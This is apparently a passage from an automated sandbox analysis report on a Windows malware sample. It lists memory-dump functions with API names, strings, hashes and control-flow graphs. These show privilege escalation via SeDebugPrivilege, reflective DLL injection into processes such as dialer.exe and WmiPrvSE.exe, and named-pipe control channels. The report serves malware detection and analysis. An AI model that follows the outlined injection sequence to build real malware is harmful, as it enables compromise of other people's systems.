                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valuetry_get_function
                                                                                                    • String ID: FlsSetValue
                                                                                                    • API String ID: 738293619-3750699315
                                                                                                    • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                                    • Instruction ID: 0641310f9fe7d9f924b52d62cf3a0baaacd80d8cc48479f7e102cd1dc34bfffd
                                                                                                    • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                                    • Instruction Fuzzy Hash: 8AE06D71A84641D1FE0B6B50F8C0EE46332AB8EF80F98D022E91906399CE38C895CB10
                                                                                                    Function 000001C08C1B1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 756756679-0
                                                                                                    • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction ID: 62222a58e76ea9e93c317499d47783acd31dac5d70bbdc91d5f302dd5aa9c3df
                                                                                                    • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction Fuzzy Hash: 4A217432A44B80C5FE138F5AA4846DAF3B0FB8AFA4F558110EE8C47B14EB78C5528700
                                                                                                    Function 000001C08C1B1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617791916-0
                                                                                                    • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                    • Instruction ID: 52254514f7b25f670cacc11c815c05f0be9b80ae36f693b5cbf099b22c12b742
                                                                                                    • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                    • Instruction Fuzzy Hash: 09E039B1A91600CAFB068B62D8447C936F1EB8EF01F88C024C90907350DF7DC499E740

                                                                                                    Executed Functions

                                                                                                    Function 0000000140002328 Relevance: 66.7, APIs: 30, Strings: 8, Instructions: 194registrythreadmemoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create$Process$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeModuleOpenTokenValue$AdjustAllocConvertErrorFindHeapInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
                                                                                                    • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                                    • API String ID: 2037067350-1130149537
                                                                                                    • Opcode ID: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                                                                    • Instruction ID: 0064b04b83878bd10eab50581479d2885e909b86cf7cbb7bba4562e6e6b3f351
                                                                                                    • Opcode Fuzzy Hash: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                                                                    • Instruction Fuzzy Hash: D5A1F7B6205B8196EB26CF62F8547DA73A9F78C794F40412AEB4A47B74DF38C549CB00
                                                                                                    Function 00000001400010C0 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 259memorystringnativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 28 1400010c0-140001110 call 1400019ac 31 1400014c5-1400014e1 28->31 32 140001116-14000111c 28->32 32->31 33 140001122-140001138 OpenProcess 32->33 33->31 34 14000113e-14000115b OpenProcess 33->34 35 140001161-140001178 K32GetModuleFileNameExW 34->35 36 140001208-140001229 NtQueryInformationProcess 34->36 37 1400011aa-1400011b6 CloseHandle 35->37 38 14000117a-140001195 PathFindFileNameW lstrlenW 35->38 39 1400014bc-1400014bf CloseHandle 36->39 40 14000122f-140001235 36->40 37->36 42 1400011b8-1400011df 37->42 38->37 41 140001197-1400011a7 StrCpyW 38->41 39->31 40->39 43 14000123b-140001253 OpenProcessToken 40->43 41->37 44 1400011e3-1400011f5 StrCmpIW 42->44 43->39 45 140001259-14000127f GetTokenInformation 43->45 44->39 46 1400011fb-140001206 44->46 47 140001281-14000128a GetLastError 45->47 48 1400012fc 45->48 46->36 46->44 47->48 50 14000128c-1400012a0 LocalAlloc 47->50 49 140001303-140001311 CloseHandle 48->49 49->39 52 140001317-14000131e 49->52 50->48 51 1400012a2-1400012c8 GetTokenInformation 50->51 53 1400012ea 51->53 54 1400012ca-1400012e8 GetSidSubAuthorityCount GetSidSubAuthority 51->54 52->39 55 140001324-14000132f 52->55 56 1400012f1-1400012fa LocalFree 53->56 54->56 55->39 57 140001335-14000133f 55->57 56->49 57->39 58 140001345-14000134f 57->58 58->39 59 140001355-140001395 call 140002010 * 3 58->59 59->39 66 14000139b-1400013bb call 140002010 StrStrA 59->66 69 1400013d3-1400013f8 call 140002010 * 2 66->69 70 1400013bd-1400013cc 66->70 69->39 76 1400013fe-140001425 VirtualAllocEx 69->76 70->66 71 1400013ce 70->71 71->39 76->39 77 14000142b-140001444 WriteProcessMemory 76->77 77->39 78 140001446-140001468 call 1400018f8 77->78 78->39 81 14000146a-140001472 78->81 81->39 82 140001474-14000147a 81->82 83 140001483-140001490 WaitForSingleObject 82->83 84 14000147c-140001481 82->84 86 1400014b1 83->86 87 140001492-1400014a6 GetExitCodeThread 83->87 85 1400014b6 CloseHandle 84->85 85->39 86->85 87->86 88 1400014a8-1400014ae 87->88 88->86
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                                    • String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
                                                                                                    • API String ID: 2561231171-2835194517
                                                                                                    • Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                                                                    • Instruction ID: 0a012d2709ccf7208303dd358812dcfe6bb15dc6c01bade59f112586625c8404
                                                                                                    • Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                                                                    • Instruction Fuzzy Hash: D5B138B5204A8186EB66DF23F8947EA37A5FB8CBC4F444129AB4A477B4EF38C545C740
                                                                                                    Function 00000001400014E4 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Free$AllocEnum$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2256533027-0
                                                                                                    • Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                                                    • Instruction ID: cf9341a8fd9423d084aaaa6a7d8b3b80e2bc7ab402b56fb27a3eccdf8bc85af4
                                                                                                    • Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                                                    • Instruction Fuzzy Hash: D7519AB2711A809AEB66CF63E8587EA22A4F78DBD4F444025EF4A47764DF38C546C700
                                                                                                    Function 0000000140001C64 Relevance: 9.1, APIs: 6, Instructions: 88memorypipeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                    • String ID:
                                                                                                    • API String ID: 3197395349-0
                                                                                                    • Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                                                    • Instruction ID: a570fa145803e090d44eaa55ab4984397cb03076929b2479bb4bcc3b6287667e
                                                                                                    • Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                                                    • Instruction Fuzzy Hash: D0415BB2611B50CAE761CF25E4807DD37B4F788B98F40512AFB4947BA8EB78C548CB40
                                                                                                    Function 0000000140002078 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128filememorystringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                    • String ID: .text$C:\Windows\System32\
                                                                                                    • API String ID: 2721474350-832442975
                                                                                                    • Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                                                                    • Instruction ID: 2464ff5d4c2995b64bfe096b2c39054b9f3fe2b2a0584e2ea435aa32f698c122
                                                                                                    • Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                                                                    • Instruction Fuzzy Hash: 6B513B76205A8092EB62DB52F858BDA73A5F78CBD8F444121EF4A07BA4DF38C509C700
                                                                                                    Function 0000000140002D84 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                    • String ID: M$\\.\pipe\dialerchildproc64
                                                                                                    • API String ID: 2203880229-3489460547
                                                                                                    • Opcode ID: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                                                                                    • Instruction ID: 5a68bd608a4fc6ab7431ec29ead35fd15cf77d15c46470c812ff7ab5360699ad
                                                                                                    • Opcode Fuzzy Hash: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                                                                                    • Instruction Fuzzy Hash: D61139B1214A8092E616DB22F8247E96364E78DBE0F444225FB5A476F4CF7CC948C700
                                                                                                    Function 000000014000228C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 137 14000228c-140002296 138 140002299-1400022ac call 140001c64 137->138 141 1400022b9-1400022c6 ConnectNamedPipe 138->141 142 1400022ae-1400022b7 Sleep 138->142 143 1400022c8-1400022e9 ReadFile 141->143 144 1400022fd-140002302 Sleep 141->144 142->138 145 140002308-140002311 DisconnectNamedPipe 143->145 146 1400022eb-1400022f0 143->146 144->145 145->141 146->145 147 1400022f2-1400022fb 146->147 147->145
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                    • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                    • API String ID: 2071455217-3440882674
                                                                                                    • Opcode ID: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                                                                                    • Instruction ID: 0d2beb54c5ceebdf84b80fb0b47548936abf997febc99fd47e2414f2e50ad015
                                                                                                    • Opcode Fuzzy Hash: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                                                                                    • Instruction Fuzzy Hash: 61012CB121464092FA17DB63F8543EAA364A78DBE1F548224FB66076F4CF7CC548C700
                                                                                                    Function 00000001400017F8 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree$CloseEnumHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1094675910-0
                                                                                                    • Opcode ID: 40ac5f9af0dc405098d955ccb8048c094732bdb2d7ea0c596abb39cc2310a86b
                                                                                                    • Instruction ID: 4b59238bf1178fd801cf3aa64f00fec842e337ceda7025f76571f25d4c0e4c48
                                                                                                    • Opcode Fuzzy Hash: 40ac5f9af0dc405098d955ccb8048c094732bdb2d7ea0c596abb39cc2310a86b
                                                                                                    • Instruction Fuzzy Hash: 24214AB2A05A4186EB5BDF67B8043E967A5EBCDBD4F188028EF0903765EE39C5458700
                                                                                                    Function 0000000140002CC0 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 173 140002cc0-140002d29 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 175 140002d76-140002d7f Sleep SleepEx 173->175 176 140002d2b-140002d3a 173->176 177 140002d64-140002d72 call 1400018b8 176->177 178 140002d3c-140002d40 176->178 177->175 179 140002d42 178->179 180 140002d53-140002d56 call 1400026c8 178->180 182 140002d46-140002d4b 179->182 186 140002d5a 180->186 184 140002d4d-140002d51 182->184 185 140002d5e-140002d62 182->185 184->180 184->182 185->177 185->178 186->185
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3676546796-0
                                                                                                    • Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                                                                    • Instruction ID: f5c9d4a5b69028f7e675e4f55ad24f1fde79fbf253f2587fb23ff6ba6251f188
                                                                                                    • Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                                                                    • Instruction Fuzzy Hash: 00216DB26046119BE72ADB17F4547AAB765F78ABC0F148029EF4607B74DF39D844CB40
                                                                                                    Function 00000001400019AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 188 1400019ac-1400019d6 OpenProcess 189 140001a01-140001a12 188->189 190 1400019d8-1400019e8 IsWow64Process 188->190 191 1400019f8-1400019fb CloseHandle 190->191 192 1400019ea-1400019f3 190->192 191->189 192->191
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseHandleOpenWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 10462204-0
                                                                                                    • Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                                                    • Instruction ID: b8256ea2c68c538602416b6aa3eb21c3f9e346f5a399754842a841befddfe838
                                                                                                    • Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                                                    • Instruction Fuzzy Hash: 21F01D7170578182EB56CF17B5943996661F78DBC0F449039EB8943768DF39C445C700
                                                                                                    Function 000002131118D97C Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 193 2131118d97c-2131118d997 194 2131118d99a-2131118d9c3 193->194 195 2131118d9cf-2131118d9d8 194->195 196 2131118d9c5-2131118d9ca 194->196 198 2131118d9f0 195->198 199 2131118d9da-2131118d9dd 195->199 197 2131118da5e-2131118da67 196->197 197->194 200 2131118da6d-2131118da87 197->200 203 2131118d9f5-2131118da06 GetStdHandle 198->203 201 2131118d9df-2131118d9e7 199->201 202 2131118d9e9-2131118d9ee 199->202 201->203 202->203 204 2131118da13 203->204 205 2131118da08-2131118da11 GetFileType 203->205 206 2131118da15-2131118da17 204->206 205->206 207 2131118da39-2131118da51 206->207 208 2131118da19-2131118da24 206->208 207->197 209 2131118da53-2131118da57 207->209 210 2131118da2d-2131118da30 208->210 211 2131118da26-2131118da2b 208->211 209->197 210->197 212 2131118da32-2131118da37 210->212 211->197 212->197
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleType
                                                                                                    • String ID:
                                                                                                    • API String ID: 3000768030-0
                                                                                                    • Opcode ID: 1967b40dd57b97bb525af26d6ad1805b1ec8d849c8768615d24505621a206a62
                                                                                                    • Instruction ID: 89c283e8f4649deb2e5a5b1c6d71c0f017a251de7302ebf8ee092477a19adb51
                                                                                                    • Opcode Fuzzy Hash: 1967b40dd57b97bb525af26d6ad1805b1ec8d849c8768615d24505621a206a62
                                                                                                    • Instruction Fuzzy Hash: 50319232614B54A1EF64CB3584982ECB762F355BB0FA45329DB6E073E0CB79D691D340
                                                                                                    Function 0000000140002314 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 213 140002314-140002318 call 140002328 215 14000231d-140002327 ExitProcess 213->215
                                                                                                    APIs
                                                                                                      • Part of subcall function 0000000140002328: VerSetConditionMask.NTDLL ref: 0000000140002397
                                                                                                      • Part of subcall function 0000000140002328: VerSetConditionMask.NTDLL ref: 00000001400023A8
                                                                                                      • Part of subcall function 0000000140002328: VerSetConditionMask.NTDLL ref: 00000001400023B9
                                                                                                      • Part of subcall function 0000000140002328: VerifyVersionInfoW.KERNEL32 ref: 00000001400023CC
                                                                                                      • Part of subcall function 0000000140002328: GetCurrentProcessId.KERNEL32 ref: 00000001400023DE
                                                                                                      • Part of subcall function 0000000140002328: OpenProcess.KERNEL32 ref: 00000001400023EE
                                                                                                      • Part of subcall function 0000000140002328: OpenProcessToken.ADVAPI32 ref: 000000014000240F
                                                                                                      • Part of subcall function 0000000140002328: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002429
                                                                                                      • Part of subcall function 0000000140002328: AdjustTokenPrivileges.ADVAPI32 ref: 000000014000246D
                                                                                                      • Part of subcall function 0000000140002328: GetLastError.KERNEL32 ref: 0000000140002477
                                                                                                      • Part of subcall function 0000000140002328: CloseHandle.KERNEL32 ref: 0000000140002480
                                                                                                      • Part of subcall function 0000000140002328: FindResourceA.KERNEL32 ref: 0000000140002494
                                                                                                      • Part of subcall function 0000000140002328: SizeofResource.KERNEL32 ref: 00000001400024AB
                                                                                                      • Part of subcall function 0000000140002328: LoadResource.KERNEL32 ref: 00000001400024C4
                                                                                                      • Part of subcall function 0000000140002328: LockResource.KERNEL32 ref: 00000001400024D6
                                                                                                      • Part of subcall function 0000000140002328: GetCurrentProcessId.KERNEL32 ref: 00000001400024E3
                                                                                                    • ExitProcess.KERNEL32 ref: 000000014000231F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2329183550-0
                                                                                                    • Opcode ID: b0a0a4fa82025a7106bcbc5f0283a7e56e2f2d2b49c7278ed3f20df004582f7f
                                                                                                    • Instruction ID: 7c7aea37a3e583da0aeb422a26f6f3708a563d165f4d83b605441c4e5f6a8964
                                                                                                    • Opcode Fuzzy Hash: b0a0a4fa82025a7106bcbc5f0283a7e56e2f2d2b49c7278ed3f20df004582f7f
                                                                                                    • Instruction Fuzzy Hash: C1B01274A0014881D51FB3F234453CC0224974C341F400C0463010B961CE3C10180312

                                                                                                    Non-executed Functions

                                                                                                    Function 0000021311182CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                    • API String ID: 2119608203-3850299575
                                                                                                    • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction ID: 1cd8e1a74313cd295a5784af730c23531421da4fb6d0bcf164b0c1445b91a088
                                                                                                    • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction Fuzzy Hash: D2B1C272220A90A2EB65CF35D4487E9E3A6F764B84F549036EE4E537A4DFB9CE41C340
                                                                                                    Function 000002131118B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction ID: 5e7a04dd01bb4e0dd15b825503e0fdcaccaee7e7a508084ec04fcac6aaf31d7f
                                                                                                    • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction Fuzzy Hash: 87316036214F80A6DB60CF35E8843DEB3A5F798758F544126EA9E43BA4DF78C655CB00
                                                                                                    Function 00000213111830B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID: dialer
                                                                                                    • API String ID: 756756679-3528709123
                                                                                                    • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                    • Instruction ID: 93c3863519c2ee1aa0e3952ffe7e8753f4b4403fc8936b857966d4e6e3197dbb
                                                                                                    • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                    • Instruction Fuzzy Hash: 37319531715B55A2EB15DF36A8482E9E3B2FB64B84F088534DE4D07B64EB7CC6618700
                                                                                                    Function 00000213111890F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2395640692-629598281
                                                                                                    • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction ID: 5612058e4c0c9761274b8fca2d33ccd3ae5ac4fcba43fd61934b127f7af3fc51
                                                                                                    • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction Fuzzy Hash: F2519A32615608AAEB54CB35E44CBD9B397F3A4BA8F50C134DA1E47788FBB9CA41C700
                                                                                                    Function 00000213111890D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
